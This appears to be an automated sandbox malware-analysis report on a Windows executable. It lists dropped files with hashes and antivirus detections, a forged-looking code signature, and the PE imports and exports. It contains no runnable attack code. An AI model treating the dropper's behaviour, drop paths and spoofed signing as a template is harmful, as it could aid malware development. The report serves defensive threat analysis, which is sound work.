Process:	C:\Users\user\Desktop\lJ2eYRm0Bd.exe
File Type:	data
Category:	dropped
Size (bytes):	828959
Entropy (8bit):	7.745470009652945
Encrypted:	false
SSDEEP:	24576:bJQqhlAyXeD9VgUnelq9rKK0TII35+x46:bJDhOVgKel1JII3C46
MD5:	CA8A56FF997260608AC69BF808F364D8
SHA1:	A65492F40F2D64D8EFB33BBF0E7AFCF4BF1A4B50
SHA-256:	69EEE39B528D4DE8E9A32A54909BD216AEB2C17C21D4647A2FE1785276878B3C
SHA-512:	C8B449AF0ED228D3138B5B9D012AF6729279250C05EBA7D3D14A457F9794633575BF3B2FFFBBA88766CE28E05E02DD68179C53B26282D0536611BBAADB143E4C
Malicious:	false
Reputation:	low
Preview:	t..w..w..w..v..3..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..R..3..R........ ......$...............$......w..w..w..w..w..w..w..w..w..w..w..4.........2...w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..4.....>......w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..R..3...+..........2.........w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w.....Y..E..w..w..w..w..w..w..w..w..w..w..

C:\Users\user\AppData\Local\Temp\kheeknpom

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	396288
Entropy (8bit):	6.7245770007434
Encrypted:	false
SSDEEP:	6144:IbPLF9Ocyp/5ci5NkcR3KT8MnIpwW1lSbxzlYK+bZxUn6erkA4uWSi711KTlgvVr:IrRUci5NB3EIblSbn6xWrk0WSi71zuDo
MD5:	D0382CD885B4DBAAA91CA457F0916F9D
SHA1:	4A40CAB723987F8B1ED8AC303D8682A377B25D8C
SHA-256:	AFD30E075E2171368E3C1EDA796E74630124CC77716C53B42DD07AEFC4F617B1
SHA-512:	3807612C172C188A91E3DDAB0AB51AC054D3646648A87DC552A163405138AA224899AB6C392A0687901EBCCE9CFDE726D0905319E64404CA4DA6DA778BF24283
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....1ST.................$..........L.............@..........................@............@.................................H........................................................................k...............................................text....#.......$.................. ..`.rdata.......@.......(..............@..@.data...............................@....reloc..............................@..Bklnhh........0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\LVMKGWHFJ\ZWAODZJSDKJ

Download File

Process:	C:\Users\user\Desktop\lJ2eYRm0Bd.exe
File Type:	data
Category:	dropped
Size (bytes):	700022
Entropy (8bit):	7.9457902094257244
Encrypted:	false
SSDEEP:	12288:IzKbcdVYuyizLGJUeCH7+q1dGzY4FYvK3Nqya5H35qXLbTtZR6FnlE5:ImbaVxyULYwqY4FYvYKH35cLbhA25
MD5:	E62595773572E53D2CD454ADA5A4CAFF
SHA1:	662A67FF55AB27394980E504D2B6433C76C7D421
SHA-256:	1C5848923B4D59858D6E5EDF9859DFC358456D1A61B475CADEDF4705158F7F5D
SHA-512:	9774F92DA77CC49F582402271457326A59B234CE78D0F6D447DAA7FEF53EC95223CD217B4C006572CF1106CF4B8A81F5CBF4994145C184E4BB2FAE2667939243
Malicious:	false
Preview:	R81m.be .h.'. ;x.h~..h}..j..@..h...!;k....f..q........fdy..0..j.r.6D..D.>P.X...5,.......,#.A..R.M........&.e......;...U\..M...#.W'.~. ......n.%!..9jVrJ@...T.k.{x.........P..}x.........t.wl.e./.h'.b/{..-.J@...{....t...,U.0D9.u.h.u...Y...tVrJ...)..].Ve..P....9$....".......(-..p9..<...9.....t..0DG....e..7.\|frJ@...o............Z..{...}8..bCKl...6....\.K.......{...[...o.6.........9.M..vh...;2.z.c..]K-....Il...m..@...M..\.G..a,...o...1...u}:!..wR....[7^...E....@....<.......p.~....\..2.).$.N.7O.T.OGt?..=..=.V...%.=..c...._.b:...h.\|'8"_.1}..){..X.v.O....}.[P&...E,.5...]$...j..W.b.7:...sK0...c..u.)...d..0Q.^..-.+r...F.#.F....l...9...?.....u>.-t5...E.....5V..<.8.mMU.S>..,.D...ku.Y.S...!.e......j..$...I.......E.@E...R.D..?.5...e.<ip...-......"...Xo.eE4'..h7.I..tf6p*.1&......Q,u.~...yr.;...l.$...^.5..Z.:.2!s..r.U....;...A.3....Y.`.y...B.N..h.q6.\....M...nG.C.>..F.RL.......pv.r5..,].l..G..K...k...Y.@k.>...(.......+..T..#.!}.nF."]....m......n2..Lc...J.....,.%

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.70084638649706
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lJ2eYRm0Bd.exe
File size:	6'599'040 bytes
MD5:	47d732373d0f515ccb37b09f2f55d178
SHA1:	0365f9d183117fd29ab29574b74b67c570651918
SHA256:	37bb336d579f839aa98af8218718eae84631c7cdf7ed4586728db333ea724987
SHA512:	565dc06a6b7645989364a4ba81d64b6524f3e0e67723abf0b41de23da00eb5a5b0eeb7c1d14aaa75b76c71603303e43b8f74443cd3eb07a552e3e64c63611d6b
SSDEEP:	98304:pTzCSONEpdVjeMOz6R3QoT9M6QmNp8rOARyI6:tzCSOepdVjnOz6R3f9HQxRyI6
TLSH:	85668D46B3F500E8C4A7E078CA4A5507DBB1BC0553209BEB316CA3951F73AE29E7E794
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........]..............1.........K.............7.......:.................).....2.......3.......>.......4.....Rich............PE..d..

File Icon


Icon Hash:	0731f048484d170e

Static PE Info

General

Entrypoint:	0x1403a213c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x55010B43 [Thu Mar 12 03:42:59 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	d9ade7d6b10847ae0c9bdee57ae6e806

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=thawte SHA256 Code Signing CA, O="thawte, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	11/20/2014 1:00:00 AM 11/21/2015 12:59:59 AM
Subject Chain	CN="Joyent, Inc", O="Joyent, Inc", L=San Francisco, S=California, C=US
Version:	3
Thumbprint MD5:	678A9D1678E4040E7C219C956EAA721C
Thumbprint SHA-1:	5382A0D995FB2CA7BE57D79372C3E986465D003D
Thumbprint SHA-256:	61625E212DCADED59C894CDFE9DE2866BBB8BA306540BFFE76A2D7FF1228A253
Serial:	54DEF11DABA5F782C77D9C8AC3CA2170

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F83784AA078h
dec eax
add esp, 28h
jmp 00007F837849C1DBh
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
dec eax
lea ecx, dword ptr [esp+30h]
call dword ptr [0003623Ch]
dec eax
mov edx, dword ptr [esp+30h]
dec eax
or ecx, FFFFFFFFh
dec ecx
mov ebx, 2AC18000h
and dword ptr [esi+62h], ecx
dec byte ptr [eax-48h]
mov ebp, D5E57A42h
xchg eax, esp
mov edi, D30349D6h
dec eax
mul edx
dec eax
mov eax, 93406FFFh
pop es
add byte ptr [eax], al
add byte ptr [eax-3Fh], cl
jmp far 0F48h : D03B4817h
dec edi
ror dword ptr [eax-7Bh], 1

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[C++] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729
[EXP] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5c72e0	0xc266	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5c5a14	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62c000	0x1a884	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x5f3000	0x314dc	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x649a00	0x1780	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x647000	0xafc4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3d8860	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3d8000	0x7c8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3d6d8a	0x3d6e00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3d8000	0x1fb546	0x1fb600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5d4000	0x1e420	0x15200	False	0.2694850221893491	data	4.071760582593677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x5f3000	0x314dc	0x31600	False	0.48809335443037977	data	6.399688028559875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
text	0x625000	0x1a31	0x1c00	False	0.4564732142857143	data	5.568529782933704	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE
data	0x627000	0x4940	0x4a00	False	0.4792546452702703	data	6.286451083249169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x62c000	0x1a884	0x1aa00	False	0.27841659330985913	data	5.006341842234157	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x647000	0xf834	0xfa00	False	0.123171875	data	4.600846132118985	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
WEVT_TEMPLATE	0x62c344	0x1522	data	English	United States	0.2748613678373383
RT_ICON	0x62d868	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 2048	English	United States	0.8147163120567376
RT_ICON	0x62dcd0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 8192	English	United States	0.5100844277673546
RT_ICON	0x62ed78	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 18432	English	United States	0.4122406639004149
RT_ICON	0x631320	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 32768	English	United States	0.3573452999527633
RT_ICON	0x635548	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 131072	English	United States	0.22348574470602153
RT_STRING	0x645d70	0x21e	data	English	United States	0.27121771217712176
RT_STRING	0x645f90	0x26e	data	English	United States	0.2684887459807074
RT_STRING	0x646200	0x18e	data	English	United States	0.36432160804020103
RT_MESSAGETABLE	0x646390	0x30	Matlab v4 mat-file (little endian) I, text, rows 1342177284, columns 1342177284, imaginary	English	United States	1.0416666666666667
RT_GROUP_ICON	0x6463c0	0x4c	data	English	United States	0.75
RT_VERSION	0x64640c	0x31c	data	English	United States	0.47738693467336685
RT_MANIFEST	0x646728	0x15a	ASCII text, with CRLF line terminators	English	United States	0.5491329479768786

Imports

DLL	Import
WS2_32.dll	gethostname, ntohs, WSAGetLastError, send, closesocket, WSASetLastError, recv, shutdown, inet_addr, ntohl, htons, htonl, socket, bind, setsockopt, recvfrom, connect, ioctlsocket, getsockopt, select, WSASocketW, WSAIoctl, GetAddrInfoW, FreeAddrInfoW, listen, WSADuplicateSocketW, getsockname, WSASend, WSARecv, getpeername, WSASendTo, WSARecvFrom, WSAStartup, accept, gethostbyname, gethostbyaddr, getservbyname, getservbyport, inet_ntoa
KERNEL32.dll	GetProcAddress, LoadLibraryA, QueryPerformanceCounter, GetTickCount, SetLastError, GlobalMemoryStatus, GetVersion, GetStdHandle, GetFileType, GetModuleHandleA, GetCurrentThreadId, FindClose, RtlVirtualUnwind, FlushConsoleInputBuffer, ExpandEnvironmentStringsA, GetWindowsDirectoryA, SetErrorMode, GetQueuedCompletionStatus, CreateIoCompletionPort, ReadDirectoryChangesW, GetFileAttributesW, CreateFileW, GetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, GetConsoleMode, SetHandleInformation, CreateEventA, PostQueuedCompletionStatus, QueueUserWorkItem, GetCurrentProcess, Process32First, InitializeCriticalSection, LeaveCriticalSection, GetModuleFileNameW, EnterCriticalSection, Process32Next, GlobalMemoryStatusEx, SetCurrentDirectoryW, GetSystemInfo, SetConsoleTitleW, GetConsoleTitleW, CreateToolhelp32Snapshot, QueryPerformanceFrequency, LoadLibraryExW, LocalFree, UnregisterWait, WriteConsoleInputW, GetNumberOfConsoleInputEvents, SetConsoleTextAttribute, ReadConsoleA, SetConsoleMode, SetConsoleCursorPosition, WriteConsoleW, FillConsoleOutputCharacterW, RegisterWaitForSingleObject, GetConsoleScreenBufferInfo, FillConsoleOutputAttribute, DuplicateHandle, ReadConsoleInputW, SetInformationJobObject, CreateProcessW, CreateJobObjectW, AssignProcessToJobObject, GetExitCodeProcess, TerminateProcess, UnregisterWaitEx, CreateFileA, GetNamedPipeHandleStateA, ConnectNamedPipe, GetStartupInfoW, FindFirstFileW, MoveFileExW, CreateDirectoryW, SetFileTime, WriteFile, ReadFile, FlushFileBuffers, CreateHardLinkW, RemoveDirectoryW, DeviceIoControl, FindNextFileW, GetFileInformationByHandle, PeekNamedPipe, CreateNamedPipeW, WaitNamedPipeW, CreateNamedPipeA, WaitForSingleObject, SwitchToThread, Sleep, SetConsoleCtrlHandler, MultiByteToWideChar, TryEnterCriticalSection, SetEvent, CreateSemaphoreA, ReleaseSemaphore, ResetEvent, WaitForMultipleObjects, DeleteCriticalSection, GetThreadContext, TlsGetValue, RtlCaptureContext, GetCurrentThread, VirtualFree, GetSystemTimeAsFileTime, TlsSetValue, LoadLibraryW, IsBadWritePtr, GetSystemDirectoryA, GetTimeZoneInformation, GetEnvironmentStringsW, GetTempFileNameA, OpenThread, IsDebuggerPresent, VirtualProtect, OutputDebugStringA, TlsAlloc, GetThreadTimes, GetTempPathA, SuspendThread, ResumeThread, DeleteFileA, HeapFree, DecodePointer, EncodePointer, HeapAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapReAlloc, FileTimeToSystemTime, FileTimeToLocalFileTime, GetDriveTypeA, FindFirstFileExA, ReadConsoleInputA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, RtlLookupFunctionEntry, ExitThread, CreateThread, SetStdHandle, InitializeCriticalSectionAndSpinCount, SetFilePointer, SetFileAttributesW, GetConsoleCP, HeapSetInformation, HeapCreate, SetHandleCount, RtlUnwindEx, RaiseException, RtlPcToFileHeader, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc, HeapSize, LCMapStringW, GetFullPathNameA, GetStringTypeW, CompareStringW, SetEnvironmentVariableA, GetDriveTypeW, SetEndOfFile, GetProcessHeap, FreeLibrary, GetVersionExA, WideCharToMultiByte, GetCurrentProcessId, CloseHandle, FreeEnvironmentStringsW, OpenFileMappingW, CreateFileMappingW, GetLastError, OpenProcess, CreateRemoteThread, SetEnvironmentVariableW, UnmapViewOfFile, MapViewOfFile, GetEnvironmentVariableW, CancelIo, FormatMessageA, SetNamedPipeHandleState, VirtualAlloc
USER32.dll	GetProcessWindowStation, MessageBoxA, GetDesktopWindow, GetUserObjectInformationW
WINMM.dll	timeGetTime
ADVAPI32.dll	RegisterEventSourceA, ReportEventA, RegQueryValueExA, RegOpenKeyExA, RegCloseKey, RegEnumKeyExA, RegQueryValueExW, RegOpenKeyExW, DeregisterEventSource
IPHLPAPI.DLL	GetAdaptersAddresses
PSAPI.DLL	GetProcessMemoryInfo

Exports

Name	Ordinal	Address
??0?$Handle@VFunctionTemplate@v8@@@v8@@QEAA@PEAVFunctionTemplate@1@@Z	1	0x140002bd0
??0?$Handle@VFunctionTemplate@v8@@@v8@@QEAA@XZ	2	0x140002bb0
??0?$Handle@VObject@v8@@@v8@@QEAA@PEAVObject@1@@Z	3	0x140002bd0
??0?$Handle@VObject@v8@@@v8@@QEAA@XZ	4	0x140002bb0
??0?$Persistent@VFunctionTemplate@v8@@@v8@@QEAA@XZ	5	0x140002bb0
??0?$Persistent@VObject@v8@@@v8@@QEAA@XZ	6	0x140002bb0
??0AccessorInfo@v8@@QEAA@PEAPEAVObject@internal@1@@Z	7	0x140002bd0
??0ActivityControl@v8@@QEAA@AEBV01@@Z	8	0x1400017c0
??0ActivityControl@v8@@QEAA@XZ	9	0x1400017c0
??0AsciiValue@String@v8@@QEAA@V?$Handle@VValue@v8@@@2@@Z	10	0x140179590
??0Buffer@node@@AEAA@V?$Handle@VObject@v8@@@v8@@_K@Z	11	0x1400139d0
??0Buffer@node@@QEAA@AEBV01@@Z	12	0x140009810
??0DeclareExtension@v8@@QEAA@PEAVExtension@1@@Z	13	0x140001380
??0Extension@v8@@QEAA@PEBD0HPEAPEBDH@Z	14	0x14015f4c0
??0ExtensionConfiguration@v8@@QEAA@HQEAPEBD@Z	15	0x140001660
??0ExternalAsciiStringResource@String@v8@@IEAA@XZ	16	0x140001110
??0ExternalAsciiStringResourceImpl@v8@@QEAA@PEBD_K@Z	17	0x1400011d0
??0ExternalAsciiStringResourceImpl@v8@@QEAA@XZ	18	0x1400011b0
??0ExternalResourceVisitor@v8@@QEAA@AEBV01@@Z	19	0x1400015a0
??0ExternalResourceVisitor@v8@@QEAA@XZ	20	0x1400015a0
??0ExternalStringResource@String@v8@@IEAA@XZ	21	0x140001110
??0ExternalStringResourceBase@String@v8@@IEAA@XZ	22	0x1400010e0
??0HandleScope@v8@@QEAA@XZ	23	0x14015fc40
??0HeapStatistics@v8@@QEAA@XZ	24	0x140173b00
??0Locker@v8@@QEAA@PEAVIsolate@1@@Z	25	0x14015cbe0
??0ObjectWrap@node@@QEAA@AEBV01@@Z	26	0x140001d30
??0ObjectWrap@node@@QEAA@XZ	27	0x1400019c0
??0OutputStream@v8@@QEAA@AEBV01@@Z	28	0x140001720
??0OutputStream@v8@@QEAA@XZ	29	0x140001720
??0PersistentHandleVisitor@v8@@QEAA@AEBV01@@Z	30	0x1400015a0
??0PersistentHandleVisitor@v8@@QEAA@XZ	31	0x1400015a0
??0ResourceConstraints@v8@@QEAA@XZ	32	0x14015f690
??0RetainedObjectInfo@v8@@IEAA@XZ	33	0x1400132c0
??0Scope@Isolate@v8@@QEAA@PEAV12@@Z	34	0x140001480
??0ScriptData@v8@@QEAA@AEBV01@@Z	35	0x140001040
??0ScriptData@v8@@QEAA@XZ	36	0x140001040
??0StartupDataDecompressor@v8@@QEAA@AEBV01@@Z	37	0x1400014b0
??0StartupDataDecompressor@v8@@QEAA@XZ	38	0x14015f160
??0TryCatch@v8@@QEAA@XZ	39	0x1401649d0
??0Unlocker@v8@@QEAA@PEAVIsolate@1@@Z	40	0x14015cea0
??0Utf8Value@String@v8@@QEAA@V?$Handle@VValue@v8@@@2@@Z	41	0x140179370
??0Value@String@v8@@QEAA@V?$Handle@VValue@v8@@@2@@Z	42	0x1401797c0
??1ActivityControl@v8@@UEAA@XZ	43	0x1400017b0
??1AsciiValue@String@v8@@QEAA@XZ	44	0x1401797b0
??1Buffer@node@@UEAA@XZ	45	0x140013a40
??1Extension@v8@@UEAA@XZ	46	0x140001270
??1ExternalAsciiStringResource@String@v8@@UEAA@XZ	47	0x1400010d0
??1ExternalAsciiStringResourceImpl@v8@@UEAA@XZ	48	0x1400010d0
??1ExternalResourceVisitor@v8@@UEAA@XZ	49	0x140001590
??1ExternalStringResource@String@v8@@UEAA@XZ	50	0x1400010d0
??1ExternalStringResourceBase@String@v8@@UEAA@XZ	51	0x1400010d0
??1HandleScope@v8@@QEAA@XZ	52	0x14015fd40
??1Locker@v8@@QEAA@XZ	53	0x14015ce40
??1ObjectWrap@node@@UEAA@XZ	54	0x1400019e0
??1OutputStream@v8@@UEAA@XZ	55	0x140001700
??1PersistentHandleVisitor@v8@@UEAA@XZ	56	0x140001590
??1RetainedObjectInfo@v8@@MEAA@XZ	57	0x1400132d0
??1Scope@Isolate@v8@@QEAA@XZ	58	0x1400014a0
??1ScriptData@v8@@UEAA@XZ	59	0x140001030
??1StartupDataDecompressor@v8@@UEAA@XZ	60	0x14015f1d0
??1TryCatch@v8@@QEAA@XZ	61	0x140164a20
??1Unlocker@v8@@QEAA@XZ	62	0x14015cf10
??1Utf8Value@String@v8@@QEAA@XZ	63	0x1401797b0
??1Value@String@v8@@QEAA@XZ	64	0x1401797b0
??4?$Handle@VFunctionTemplate@v8@@@v8@@QEAAAEAV01@AEBV01@@Z	65	0x1400019b0
??4?$Handle@VObject@v8@@@v8@@QEAAAEAV01@AEBV01@@Z	66	0x1400019b0
??4?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAAEAV01@AEBV01@@Z	67	0x1400019b0
??4?$Persistent@VObject@v8@@@v8@@QEAAAEAV01@AEBV01@@Z	68	0x1400019b0
??4AccessorInfo@v8@@QEAAAEAV01@AEBV01@@Z	69	0x1400019b0
??4AccessorSignature@v8@@QEAAAEAV01@AEBV01@@Z	70	0x1400011a0
??4ActivityControl@v8@@QEAAAEAV01@AEBV01@@Z	71	0x1400011a0
??4Buffer@node@@QEAAAEAV01@AEBV01@@Z	72	0x140009860
??4Context@v8@@QEAAAEAV01@AEBV01@@Z	73	0x1400011a0
??4CpuProfile@v8@@QEAAAEAV01@AEBV01@@Z	74	0x1400011a0
??4CpuProfileNode@v8@@QEAAAEAV01@AEBV01@@Z	75	0x1400011a0
??4CpuProfiler@v8@@QEAAAEAV01@AEBV01@@Z	76	0x1400011a0
??4Data@HandleScope@v8@@QEAAAEAV012@AEBV012@@Z	77	0x140001010
??4Data@v8@@QEAAAEAV01@AEBV01@@Z	78	0x1400011a0
??4Debug@v8@@QEAAAEAV01@AEBV01@@Z	79	0x1400011a0
??4DeclareExtension@v8@@QEAAAEAV01@AEBV01@@Z	80	0x1400011a0
??4Exception@v8@@QEAAAEAV01@AEBV01@@Z	81	0x1400011a0
??4ExtensionConfiguration@v8@@QEAAAEAV01@AEBV01@@Z	82	0x140001670
??4ExternalResourceVisitor@v8@@QEAAAEAV01@AEBV01@@Z	83	0x1400011a0
??4FunctionTemplate@v8@@QEAAAEAV01@AEBV01@@Z	84	0x1400011a0
??4HeapGraphEdge@v8@@QEAAAEAV01@AEBV01@@Z	85	0x1400011a0
??4HeapGraphNode@v8@@QEAAAEAV01@AEBV01@@Z	86	0x1400011a0
??4HeapProfiler@v8@@QEAAAEAV01@AEBV01@@Z	87	0x1400011a0
??4HeapSnapshot@v8@@QEAAAEAV01@AEBV01@@Z	88	0x1400011a0
??4HeapStatistics@v8@@QEAAAEAV01@AEBV01@@Z	89	0x140001450
??4Message@v8@@QEAAAEAV01@AEBV01@@Z	90	0x1400011a0
??4ObjectTemplate@v8@@QEAAAEAV01@AEBV01@@Z	91	0x1400011a0
??4ObjectWrap@node@@QEAAAEAV01@AEBV01@@Z	92	0x140001d50
??4OutputStream@v8@@QEAAAEAV01@AEBV01@@Z	93	0x1400011a0
??4PersistentHandleVisitor@v8@@QEAAAEAV01@AEBV01@@Z	94	0x1400011a0
??4ResourceConstraints@v8@@QEAAAEAV01@AEBV01@@Z	95	0x140001010
??4Script@v8@@QEAAAEAV01@AEBV01@@Z	96	0x1400011a0
??4ScriptData@v8@@QEAAAEAV01@AEBV01@@Z	97	0x1400011a0
??4Signature@v8@@QEAAAEAV01@AEBV01@@Z	98	0x1400011a0
??4StackFrame@v8@@QEAAAEAV01@AEBV01@@Z	99	0x1400011a0
??4StackTrace@v8@@QEAAAEAV01@AEBV01@@Z	100	0x1400011a0
??4StartupDataDecompressor@v8@@QEAAAEAV01@AEBV01@@Z	101	0x1400014d0
??4Template@v8@@QEAAAEAV01@AEBV01@@Z	102	0x1400011a0
??4Testing@v8@@QEAAAEAV01@AEBV01@@Z	103	0x1400011a0
??4TryCatch@v8@@QEAAAEAV01@AEBV01@@Z	104	0x140001630
??4TypeSwitch@v8@@QEAAAEAV01@AEBV01@@Z	105	0x1400011a0
??4Unlocker@v8@@QEAAAEAV01@AEBV01@@Z	106	0x1400019b0
??4V8@v8@@QEAAAEAV01@AEBV01@@Z	107	0x1400011a0
??C?$Handle@VFunctionTemplate@v8@@@v8@@QEBAPEAVFunctionTemplate@1@XZ	108	0x140002bf0
??C?$Handle@VObject@v8@@@v8@@QEBAPEAVObject@1@XZ	109	0x140002bf0
??D?$Handle@VFunctionTemplate@v8@@@v8@@QEBAPEAVFunctionTemplate@1@XZ	110	0x140002bf0
??D?$Handle@VObject@v8@@@v8@@QEBAPEAVObject@1@XZ	111	0x140002bf0
??DAsciiValue@String@v8@@QEAAPEADXZ	112	0x140002bf0
??DAsciiValue@String@v8@@QEBAPEBDXZ	113	0x140002bf0
??DUtf8Value@String@v8@@QEAAPEADXZ	114	0x140002bf0
??DUtf8Value@String@v8@@QEBAPEBDXZ	115	0x140002bf0
??DValue@String@v8@@QEAAPEAGXZ	116	0x140002bf0
??DValue@String@v8@@QEBAPEBGXZ	117	0x140002bf0
??_7ActivityControl@v8@@6B@	118	0x1403dbed0
??_7Buffer@node@@6B@	119	0x1403dde40
??_7Extension@v8@@6B@	120	0x1403dbe70
??_7ExternalAsciiStringResource@String@v8@@6B@	121	0x1403dbe30
??_7ExternalAsciiStringResourceImpl@v8@@6B@	122	0x1403dbe50
??_7ExternalResourceVisitor@v8@@6B@	123	0x1403dbe90
??_7ExternalStringResource@String@v8@@6B@	124	0x1403dbe30
??_7ExternalStringResourceBase@String@v8@@6B@	125	0x1403dbe20
??_7ObjectWrap@node@@6B@	126	0x1403dbee0
??_7OutputStream@v8@@6B@	127	0x1403dbea0
??_7PersistentHandleVisitor@v8@@6B@	128	0x1403dbe90
??_7RetainedObjectInfo@v8@@6B@	129	0x1404f1800
??_7ScriptData@v8@@6B@	130	0x1403dbe00
??_7StartupDataDecompressor@v8@@6B@	131	0x1403dbe80
??_FLocker@v8@@QEAAXXZ	132	0x1400016f0
??_FUnlocker@v8@@QEAAXXZ	133	0x140001690
?AddCallCompletedCallback@V8@v8@@SAXP6AXXZ@Z	134	0x140178ed0
?AddGCEpilogueCallback@V8@v8@@SAXP6AXW4GCType@2@W4GCCallbackFlags@2@@Z0@Z	135	0x140178bd0
?AddGCPrologueCallback@V8@v8@@SAXP6AXW4GCType@2@W4GCCallbackFlags@2@@Z0@Z	136	0x140178a60
?AddImplicitReferences@V8@v8@@SAXV?$Persistent@VObject@v8@@@2@PEAV?$Persistent@VValue@v8@@@2@_K@Z	137	0x140178840
?AddInstancePropertyAccessor@FunctionTemplate@v8@@AEAAXV?$Handle@VString@v8@@@2@P6A?AV?$Handle@VValue@v8@@@2@V?$Local@VString@v8@@@2@AEBVAccessorInfo@2@@ZP6AX1V?$Local@VValue@v8@@@2@2@ZV42@W4AccessControl@2@W4PropertyAttribute@2@V?$Handle@VAccessorSignature@v8@@@2@@Z	138	0x1401617a0
?AddMemoryAllocationCallback@V8@v8@@SAXP6AXW4ObjectSpace@2@W4AllocationAction@2@H@Z01@Z	139	0x140178d40
?AddMessageListener@V8@v8@@SA_NP6AXV?$Handle@VMessage@v8@@@2@V?$Handle@VValue@v8@@@2@@Z1@Z	140	0x140177e90
?AddObjectGroup@V8@v8@@SAXPEAV?$Persistent@VValue@v8@@@2@_KPEAVRetainedObjectInfo@2@@Z	141	0x140178790
?AdjustAmountOfExternalAllocatedMemory@V8@v8@@SA_J_J@Z	142	0x140178920
?AllowCodeGenerationFromStrings@Context@v8@@QEAAX_N@Z	143	0x140174b80
?AsArray@StackTrace@v8@@QEAA?AV?$Local@VArray@v8@@@2@XZ	144	0x1401668b0
